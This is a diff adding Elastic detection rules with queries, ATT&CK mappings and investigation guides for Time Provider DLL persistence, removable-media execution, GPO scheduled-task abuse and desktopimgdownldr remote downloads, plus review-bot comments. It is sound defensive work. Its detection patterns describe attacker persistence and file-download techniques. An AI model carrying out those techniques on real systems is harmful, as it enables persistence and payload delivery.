Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine whether the DLL is signed.\n- Retrieve the DLL and determine if it is malicious:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path 
JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restore Time Provider settings to the desired state.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type:\"change\" and\n registry.path: (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\W32Time\\\\TimeProviders\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\W32Time\\\\TimeProviders\\\\*\"\n ) and\n registry.data.strings:\"*.dll\" and\n not\n (\n process.executable : \"?:\\\\Windows\\\\System32\\\\msiexec.exe\" and\n registry.data.strings : \"?:\\\\Program Files\\\\VMware\\\\VMware Tools\\\\vmwTimeProvider\\\\vmwTimeProvider.dll\"\n )\n", + "references": [ + "https://pentestlab.blog/2019/10/22/persistence-time-providers/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "14ed1aa9-ebfd-4cf9-a463-0ac59ec55204", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": 
"https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.003", + "name": "Time Providers", + "reference": "https://attack.mitre.org/techniques/T1547/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.003", + "name": "Time Providers", + "reference": "https://attack.mitre.org/techniques/T1547/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_109.json b/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_109.json new file mode 100644 index 00000000000..4e6ed8f7ad4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_109.json 
@@ -0,0 +1,119 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies modification of the Time Provider. Adversaries may establish persistence by registering and enabling a malicious DLL as a time provider. Windows uses the time provider architecture to obtain accurate time stamps from other network devices or clients in the network. Time providers are implemented in the form of a DLL file which resides in the System32 folder. The service W32Time initiates during the startup of Windows and loads w32time.dll.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Persistence via Time Provider Modification", + "note": "## Triage and analysis\n\n### Investigating Potential Persistence via Time Provider Modification\n\nThe Time Provider architecture in Windows is responsible for obtaining accurate timestamps from network devices or clients. It is implemented as a DLL file in the System32 folder and is initiated by the W32Time service during Windows startup. Adversaries may exploit this by registering and enabling a malicious DLL as a time provider to establish persistence. \n\nThis rule identifies changes in the registry paths associated with Time Providers, specifically targeting the addition of new DLL files.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine whether the DLL is signed.\n- Retrieve the DLL and determine if it is malicious:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path 
JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restore Time Provider settings to the desired state.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type:\"change\" and\n registry.path: (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\W32Time\\\\TimeProviders\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\W32Time\\\\TimeProviders\\\\*\"\n ) and\n registry.data.strings:\"*.dll\" and\n not\n (\n process.executable : \"?:\\\\Windows\\\\System32\\\\msiexec.exe\" and\n registry.data.strings : \"?:\\\\Program Files\\\\VMware\\\\VMware Tools\\\\vmwTimeProvider\\\\vmwTimeProvider.dll\"\n )\n", + "references": [ + "https://pentestlab.blog/2019/10/22/persistence-time-providers/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "14ed1aa9-ebfd-4cf9-a463-0ac59ec55204", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": 
"https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.003", + "name": "Time Providers", + "reference": "https://attack.mitre.org/techniques/T1547/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.003", + "name": "Time Providers", + "reference": "https://attack.mitre.org/techniques/T1547/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1542fa53-955e-4330-8e4d-b2d812adeb5f_2.json b/packages/security_detection_engine/kibana/security_rule/1542fa53-955e-4330-8e4d-b2d812adeb5f_2.json new file mode 100644 index 00000000000..4d64cd5297e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1542fa53-955e-4330-8e4d-b2d812adeb5f_2.json 
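Review bot: `related_integrations` in this rule lists only the `endpoint` package (`^8.2.0`), yet `index` also targets `logs-windows.sysmon_operational-*`; the sibling rule 15c0b7a7-…_111 in this same diff declares the `windows` integration for its `logs-windows.*` pattern, so the Sysmon index here appears to have no matching integration entry. If `related_integrations` is meant to cover every index pattern a rule queries, an entry mirroring the siblings' pin, `{ "package": "windows", "version": "^1.5.0" }`, would make the two lists agree. The `tags` array also lacks `Resources: Investigation Guide` even though `note` carries a full triage guide, while 15a8ba77-…_110 and 15c0b7a7-…_111 tag theirs. The `_108` version of this file earlier in the diff has the same `related_integrations` and `tags` lists, so whichever correction is chosen applies to both.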
@@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies process execution from a removable media and by an unusual process. Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Execution from a Removable Media with Network Connection", + "query": "sequence by process.entity_id with maxspan=5m\n [process where host.os.type == \"windows\" and event.action == \"start\" and\n \n /* Direct Exec from USB */\n (process.Ext.device.bus_type : \"usb\" or process.Ext.device.product_id : \"USB *\") and\n (process.code_signature.trusted == false or process.code_signature.exists == false) and \n \n not process.code_signature.status : (\"errorExpired\", \"errorCode_endpoint*\")]\n [network where host.os.type == \"windows\" and event.action == \"connection_attempted\"]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.device.bus_type", + "type": "unknown" + }, + { + "ecs": false, + "name": "process.Ext.device.product_id", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.code_signature.exists", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.code_signature.status", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "1542fa53-955e-4330-8e4d-b2d812adeb5f", + "severity": "low", + "tags": [ + "Domain: 
Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1091", + "name": "Replication Through Removable Media", + "reference": "https://attack.mitre.org/techniques/T1091/" + } + ] + } + ], + "type": "eql", + "version": 2 + }, + "id": "1542fa53-955e-4330-8e4d-b2d812adeb5f_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_110.json b/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_110.json new file mode 100644 index 00000000000..1c2db4a3b81 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_110.json 
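Review bot: This rule has no `"timestamp_override": "event.ingested"`, which every other rule in this diff (14ed1aa9-…, 15a8ba77-…, 15c0b7a7-…) sets; with `"from": "now-9m"` the lookback is evaluated against `@timestamp`, so endpoint events that reach the cluster late can fall outside the window and be missed. Adding `"timestamp_override": "event.ingested",` just before `"type": "eql"` would align it with the siblings. The second sequence stage, `[network where host.os.type == "windows" and event.action == "connection_attempted"]`, accepts any connection attempt, including loopback or link-local destinations, so the sequence can complete on purely local activity; whether to narrow the destination is a tuning decision the authors may want to record. This is also the only rule in the diff without a `note`, so analysts receiving the low-severity alert get no triage guidance.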
@@ -0,0 +1,142 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the modification of Group Policy Object attributes to execute a scheduled task in the objects controlled by the GPO.", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Scheduled Task Execution at Scale via GPO", + "note": "## Triage and analysis\n\n### Investigating Scheduled Task Execution at Scale via GPO\n\nGroup Policy Objects (GPOs) can be used by attackers to execute scheduled tasks at scale to compromise objects controlled by a given GPO. This is done by changing the contents of the `\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml` file.\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `` and `` XML tags for any potentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is allowed and done under change management, and if the execution is legitimate.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Startup/Logon Script added to Group Policy Object - 16fac1a1-21ee-4ca6-b720-458e3855d046\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scheduled tasks attached.\n- 
Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "(event.code: \"5136\" and winlog.event_data.AttributeLDAPDisplayName:(\"gPCMachineExtensionNames\" or \"gPCUserExtensionNames\") and\n winlog.event_data.AttributeValue:(*CAB54552-DEEA-4691-817E-ED4A4D1AFC72* and *AADCED64-746C-4633-A97C-D61349046527*))\nor\n(event.code: \"5145\" and winlog.event_data.ShareName: \"\\\\\\\\*\\\\SYSVOL\" and winlog.event_data.RelativeTargetName: *ScheduledTasks.xml and\n (message: WriteData or winlog.event_data.AccessList: *%%4417*))\n", + "references": [ + "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0025_windows_audit_directory_service_changes.md", + "https://github.com/atc-project/atc-data/blob/f2bbb51ecf68e2c9f488e3c70dcdd3df51d2a46b/docs/Logging_Policies/LP_0029_windows_audit_detailed_file_share.md", + "https://labs.f-secure.com/tools/sharpgpoabuse", + "https://twitter.com/menasec1/status/1106899890377052160", + "https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/security/win_gpo_scheduledtasks.yml" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "message", + "type": "match_only_text" + }, + { + "ecs": false, + "name": "winlog.event_data.AccessList", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeLDAPDisplayName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeValue", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.RelativeTargetName", + "type": "unknown" + }, + { + "ecs": false, + "name": 
"winlog.event_data.ShareName", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "15a8ba77-1c13-4274-88fe-6bd14133861e", + "setup": "## Setup\n\nThe 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Lateral Movement", + "Data Source: Active Directory", + "Resources: Investigation Guide", + "Use Case: Active Directory Monitoring" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + }, + { + "id": "T1484", + "name": "Domain Policy Modification", + "reference": "https://attack.mitre.org/techniques/T1484/", + "subtechnique": [ + { + "id": "T1484.001", + "name": "Group Policy Modification", + "reference": "https://attack.mitre.org/techniques/T1484/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + 
"id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1570", + "name": "Lateral Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1570/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 110 + }, + "id": "15a8ba77-1c13-4274-88fe-6bd14133861e_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_111.json b/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_111.json new file mode 100644 index 00000000000..707ed2d5593 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_111.json 
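Review bot: In `note`, the investigation step "check the `` and `` XML tags for any potentially malicious commands or binaries" has two empty inline-code spans where the element names should be, so the reader is not told which parts of `ScheduledTasks.xml` to inspect; if this is in the file rather than an artifact of how the diff was rendered (angle-bracketed names stripped as markup), the element names should be restored. The `setup` text correctly requires both 'Audit Detailed File Share' and 'Audit Directory Service Changes', but `note` does not say that the 5145 (`*ScheduledTasks.xml` under `SYSVOL`) branch produces nothing without the former, so an analyst may assume the 5136 branch alone gives coverage; a one-line reminder under "Possible investigation steps" would close that gap. Detailed file share auditing is also high-volume, which is worth stating next to the policy steps so operators size their ingest accordingly.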
@@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote File Download via Desktopimgdownldr Utility", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via Desktopimgdownldr Utility\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `Desktopimgdownldr.exe` utility is used to to configure lockscreen/desktop image, and can be abused with the `lockscreenurl` argument to download remote files and tools, this rule looks for this behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses the [Investigate Markdown Plugin](https://www.elastic.co/guide/en/security/master/interactive-investigation-guides.html) introduced in Elastic Stack version 8.8.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - !{investigate{\"label\":\"Alerts associated with the user in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"user.id\",\"queryType\":\"phrase\",\"value\":\"{{user.id}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n - !{investigate{\"label\":\"Alerts associated with the host in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"host.name\",\"queryType\":\"phrase\",\"value\":\"{{host.name}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check the reputation of the domain or IP address used to host the downloaded file or if the user downloaded the file from an internal system.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - !{investigate{\"label\":\"Investigate the Subject Process 
Network Events\",\"providers\":[[{\"excluded\":false,\"field\":\"process.entity_id\",\"queryType\":\"phrase\",\"value\":\"{{process.entity_id}}\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"event.category\",\"queryType\":\"phrase\",\"value\":\"network\",\"valueType\":\"string\"}]]}}\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. 
Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unusual but can be done by administrators. Benign true positives (B-TPs) can be added as exceptions if necessary.\n- Analysts can dismiss the alert if the downloaded file is a legitimate image.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"desktopimgdownldr.exe\" or ?process.pe.original_file_name == \"desktopimgdownldr.exe\") and\n process.args : \"/lockscreenurl:http*\"\n", + "references": [ + "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "15c0b7a7-9c34-4869-b25b-fa6518414899", + "setup": "## Setup\n\nIf enabling an EQL 